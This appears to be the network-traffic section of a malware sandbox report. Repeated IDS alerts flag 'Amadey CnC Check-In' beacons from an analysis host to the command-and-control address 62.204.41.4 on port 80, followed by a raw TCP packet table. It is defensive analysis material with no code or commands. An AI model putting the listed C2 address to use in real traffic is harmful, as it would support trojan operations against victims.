                                                                    192.168.2.362.204.41.449789802027700 02/08/23-21:31:41.224340TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449748802027700 02/08/23-21:31:28.171578TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449784802027700 02/08/23-21:31:39.982751TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449826802027700 02/08/23-21:31:50.292455TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449909802027700 02/08/23-21:32:14.933906TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449832802027700 02/08/23-21:31:51.751305TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449743802027700 02/08/23-21:31:26.963197TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449930802027700 02/08/23-21:32:20.796642TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449838802027700 02/08/23-21:31:54.373776TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449936802027700 02/08/23-21:32:22.307700TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449927802027700 02/08/23-21:32:20.024415TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449829802027700 02/08/23-21:31:51.027291TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449945802027700 02/08/23-21:32:24.485227TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449856802027700 02/08/23-21:32:00.132402TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449749802027700 02/08/23-21:31:28.419020TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449847802027700 02/08/23-21:31:57.967039TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449758802027700 02/08/23-21:31:30.574106TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449786802027700 02/08/23-21:31:40.457663TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449767802027700 02/08/23-21:31:33.408799TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449875802027700 02/08/23-21:32:04.746050TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449780802027700 02/08/23-21:31:38.981621TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449710802027700 02/08/23-21:31:11.651177TCP2027700ET TROJAN Amadey CnC Check-In4971080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449860802027700 02/08/23-21:32:01.115035TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449911802027700 02/08/23-21:32:16.121219TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449813802027700 02/08/23-21:31:47.049281TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449902802027700 02/08/23-21:32:11.276709TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449771802027700 02/08/23-21:31:36.658549TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449822802027700 02/08/23-21:31:49.295197TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449733802027700 02/08/23-21:31:24.349655TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449946802027700 02/08/23-21:32:24.773081TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449857802027700 02/08/23-21:32:00.376328TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449898802027700 02/08/23-21:32:10.281507TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449768802027700 02/08/23-21:31:33.720032TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449964802027700 02/08/23-21:32:29.755518TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449739802027700 02/08/23-21:31:25.862579TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449828802027700 02/08/23-21:31:50.782978TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449917802027700 02/08/23-21:32:17.561486TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449894802027700 02/08/23-21:32:09.316597TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449918802027700 02/08/23-21:32:17.798708TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449770802027700 02/08/23-21:31:35.698493TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449787802027700 02/08/23-21:31:40.714503TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449752802027700 02/08/23-21:31:29.152515TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449841802027700 02/08/23-21:31:56.501984TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449901802027700 02/08/23-21:32:11.021221TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449968802027700 02/08/23-21:32:30.770420TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449806802027700 02/08/23-21:31:45.331321TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449812802027700 02/08/23-21:31:46.808504TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449714802027700 02/08/23-21:31:13.211259TCP2027700ET TROJAN Amadey CnC Check-In4971480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449803802027700 02/08/23-21:31:44.620668TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449879802027700 02/08/23-21:32:05.692639TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449708802027700 02/08/23-21:31:11.181341TCP2027700ET TROJAN Amadey CnC Check-In4970880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449888802027700 02/08/23-21:32:07.875066TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449717802027700 02/08/23-21:31:14.890076TCP2027700ET TROJAN Amadey CnC Check-In4971780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449799802027700 02/08/23-21:31:43.671152TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449742802027700 02/08/23-21:31:26.717821TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449831802027700 02/08/23-21:31:51.495547TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449825802027700 02/08/23-21:31:50.017874TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449949802027700 02/08/23-21:32:25.497713TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449920802027700 02/08/23-21:32:18.281072TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449955802027700 02/08/23-21:32:27.359900TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449701802027700 02/08/23-21:31:09.596330TCP2027700ET TROJAN Amadey CnC Check-In4970180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449914802027700 02/08/23-21:32:16.837700TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449866802027700 02/08/23-21:32:02.560496TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449736802027700 02/08/23-21:31:25.096773TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449908802027700 02/08/23-21:32:14.246091TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449777802027700 02/08/23-21:31:38.278119TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449819802027700 02/08/23-21:31:48.579157TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449796802027700 02/08/23-21:31:42.929791TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449761802027700 02/08/23-21:31:31.280569TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449891802027700 02/08/23-21:32:08.577608TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449885802027700 02/08/23-21:32:07.169004TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449720802027700 02/08/23-21:31:17.276374TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449850802027700 02/08/23-21:31:58.686515TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.362.204.41.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Feb 8, 2023 21:31:09.521332026 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.521858931 CET4970280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.582285881 CET804970262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.582480907 CET4970280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.583008051 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.583154917 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.595885992 CET4970280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.596329927 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.656325102 CET804970262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.656357050 CET804970262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.656446934 CET4970280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.658050060 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.661412954 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.661498070 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.718036890 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779632092 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779687881 CET4970280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779712915 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779735088 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779755116 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779783964 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779795885 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779819012 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779834986 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779865026 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779867887 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779894114 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779896021 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779917955 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779922962 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779942036 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779947996 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779957056 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.779970884 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.779988050 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.780010939 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.780762911 CET4970380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.840359926 CET804970262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841473103 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841496944 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841516018 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841538906 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841564894 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841568947 CET4970280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.841588974 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841593981 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.841613054 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841636896 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.841640949 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841664076 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841681957 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.841691017 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.841713905 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.841730118 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.842067003 CET804970362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.842156887 CET4970380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.854969025 CET4970380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.903326035 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903367043 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903388023 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903402090 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903419971 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903418064 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.903434992 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903459072 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903460979 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.903484106 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903503895 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903512955 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.903527975 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903547049 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.903549910 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.903578043 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.903611898 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.916412115 CET804970362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.918930054 CET804970362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.919075012 CET4970380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.965027094 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965059042 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965080976 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965101004 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965121031 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965141058 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965161085 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965182066 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965200901 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965219975 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965226889 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.965240002 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:09.965274096 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:09.965296030 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.027317047 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027355909 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027378082 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027414083 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027436972 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027456999 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027468920 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.027544975 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.027560949 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027585030 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027607918 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027632952 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.027667046 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027676105 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.027690887 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027714014 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.027733088 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.027792931 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.029830933 CET4970380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.031034946 CET4970480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.088998079 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089026928 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089047909 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089066029 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089087009 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089106083 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089124918 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089138031 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.089143991 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089167118 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089186907 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089196920 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.089210033 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089216948 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.089232922 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.089251041 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.089282036 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.091345072 CET804970362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.091646910 CET4970380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.092139006 CET804970462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.092257023 CET4970480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.105006933 CET4970480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.151701927 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.151740074 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.151760101 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.151778936 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.151789904 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.151802063 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.151818037 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.151849985 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.151878119 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.168303967 CET804970462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.172152042 CET804970462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.172214031 CET4970480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.329083920 CET4970480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.333487988 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.348932981 CET4970580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.390387058 CET804970462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.390496016 CET4970480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.395041943 CET804970162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.395147085 CET4970180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.409198999 CET804970562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.409336090 CET4970580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.447077036 CET4970580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.507356882 CET804970562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.509819984 CET804970562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.509953976 CET4970580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.640367031 CET4970580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.641089916 CET4970680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.700675964 CET804970562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.700710058 CET804970662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.700779915 CET4970580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.700860023 CET4970680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.701281071 CET4970680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.760885000 CET804970662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.763241053 CET804970662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.763351917 CET4970680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.868005037 CET4970680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.872266054 CET4970780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.927740097 CET804970662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.929357052 CET4970680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.934396982 CET804970762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:10.935343981 CET4970780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.935837030 CET4970780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:10.998013020 CET804970762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.000245094 CET804970762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.000345945 CET4970780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.118359089 CET4970780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.119368076 CET4970880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.178745031 CET804970862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.180594921 CET804970762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.180804014 CET4970780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.181340933 CET4970880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.181340933 CET4970880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.240797043 CET804970862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.245002985 CET804970862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.245217085 CET4970880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.352380991 CET4970880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.353141069 CET4970980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.411986113 CET804970862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.412236929 CET4970880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.415550947 CET804970962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.415733099 CET4970980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.416191101 CET4970980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.479048967 CET804970962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.481261015 CET804970962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.481499910 CET4970980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.587414980 CET4970980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.588182926 CET4971080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.649993896 CET804970962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.650101900 CET4970980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.650593996 CET804971062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.650757074 CET4971080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.651176929 CET4971080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.713561058 CET804971062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.715651035 CET804971062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:11.715744019 CET4971080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.821365118 CET4971080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:11.822381973 CET4971180192.168.2.362.204.41.4
